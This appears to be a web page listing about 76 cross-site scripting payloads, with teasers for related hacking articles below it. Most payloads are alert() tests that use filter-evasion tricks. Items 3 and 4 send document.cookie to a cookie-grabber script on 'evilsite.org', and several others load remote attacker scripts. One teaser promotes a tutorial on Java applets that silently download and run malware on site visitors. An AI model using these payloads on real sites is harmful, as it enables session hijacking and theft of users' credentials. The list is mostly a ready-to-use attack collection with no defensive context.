1. <script>alert(1);</script>
    2. 
	
  2. <script>alert('XSS');</script>
    3. 
	
  3. <script src="http://www.evilsite.org/cookiegrabber.php"></script>
    4. 
	
  4. <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
    5. 
	
  5. <scr<script>ipt>alert('XSS');</scr</script>ipt>
    6. 
	
  6. <script>alert(String.fromCharCode(88,83,83))</script>
    7. 
	
  7. <img src=foo.png onerror=alert(/xssed/) />
    8. 
	
  8. <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
    9. 
	
  9. <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
    10. 
	
  10. <marquee><script>alert('XSS')</script></marquee>
    11. 
	
  11. <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
    12. 
	
  12. <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
    13. 
	
  13. <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
    14. 
	
  14. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
    15. 
	
  15. "><script>alert(0)</script>
    16. 
	
  16. <script src=http://yoursite.com/your_files.js></script>
    17. 
	
  17. </title><script>alert(/xss/)</script>
    18. 
	
  18. </textarea><script>alert(/xss/)</script>
    19. 
	
  19. <IMG LOWSRC=\"javascript:alert('XSS')\">
    20. 
	
  20. <IMG DYNSRC=\"javascript:alert('XSS')\">
    21. 
	
  21. <font style='color:expression(alert(document.cookie))'>
    22. 
	
  22. '); alert('XSS
    23. 
	
  23. <img src="javascript:alert('XSS')">
    24. 
	
  24. <script language="JavaScript">alert('XSS')</script>
    25. 
	
  25. [url=javascript:alert('XSS');]click me[/url]
    26. 
	
  26. <body onunload="javascript:alert('XSS');">
    27. 
	
  27. <body onLoad="alert('XSS');"
    28. 
	
  28. [color=red' onmouseover="alert('xss')"]mouse over[/color]
    29. 
	
  29. "/></a></><img src=1.gif onerror=alert(1)>
    30. 
	
  30. window.alert("Bonjour !");
    31. 
	
  31. <div style="x:expression((window.r==1)?'':eval('r=1;
    32. 
	
  32. alert(String.fromCharCode(88,83,83));'))">
    33. 
	
  33. <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
    34. 
	
  34. "><script alert(String.fromCharCode(88,83,83))</script>
    35. 
	
  35. '>><marquee><h1>XSS</h1></marquee>
    36. 
	
  36. '">><script>alert('XSS')</script>
    37. 
	
  37. '">><marquee><h1>XSS</h1></marquee>
    38. 
	
  38. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
    39. 
	
  39. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
    40. 
	
  40. <script>var var = 1; alert(var)</script>
    41. 
	
  41. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
    42. 
	
  42. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
    43. 
	
  43. <IMG SRC='vbscript:msgbox(\"XSS\")'>
    44. 
	
  44. " onfocus=alert(document.domain) "> <"
    45. 
	
  45. <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
    46. 
	
  46. <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
    47. 
	
  47. perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
    48. 
	
  48. perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
    49. 
	
  49. <br size=\"&{alert('XSS')}\">
    50. 
	
  50. <scrscriptipt>alert(1)</scrscriptipt>
    51. 
	
  51. </br style=a:expression(alert())>
    52. 
	
  52. </script><script>alert(1)</script>
    53. 
	
  53. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
    54. 
	
  54. [color=red width=expression(alert(123))][color]
    55. 
	
  55. <BASE HREF="javascript:alert('XSS');//">
    56. 
	
  56. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
    57. 
	
  57. "></iframe><script>alert(123)</script>
    58. 
	
  58. <body onLoad="while(true) alert('XSS');">
    59. 
	
  59. '"></title><script>alert(1111)</script>
    60. 
	
  60. </textarea>'"><script>alert(document.cookie)</script>
    61. 
	
  61. '""><script language="JavaScript"> alert('X \nS \nS');</script>
    62. 
	
  62. </script></script><<<<script><>>>><<<script>alert(123)</script>
    63. 
	
  63. <html><noalert><noscript>(123)</noscript><script>(123)</script>
    64. 
	
  64. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
    65. 
	
  65. '></select><script>alert(123)</script>
    66. 
	
  66. '>"><script src = 'http://www.site.com/XSS.js'></script>
    67. 
	
  67. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
    68. 
	
  68. <SCRIPT>document.write("XSS");</SCRIPT>
    69. 
	
  69. a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
    70. 
	
  70. ='><script>alert("xss")</script>
    71. 
	
  71. <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
    72. 
	
  72. <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
    73. 
	
  73. ">/PlanetCreator/><script>alert(document.cookie)</script><script   src="http://www.site.com/XSS.js"></script>
    74. 
	
  74.  ">/PlanetCreator/><script>alert(document.cookie)</script>
    75. 
	
  75. src="http://www.site.com/XSS.js">
    76. 
	
  76. data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
    77.

Explore More

Hacker Halted Asia Pacific 2010

2010. Entering the new decade, have we done enough to secure our information? Or will we be found wanting by the end of this decade? History is a great teacher,

Read More

Download Execution with Java

This tutorial will show you how to use java applets within your website which automatically download and execute your malware onto the visitor’s computer. Some people may of heard about

Read More

Computer Hacking

Computer hacking is the practice of modifying computer hardware and software to accomplish a goal outside of the creator’s original purpose. People who engage in computer hacking activities are often

Read More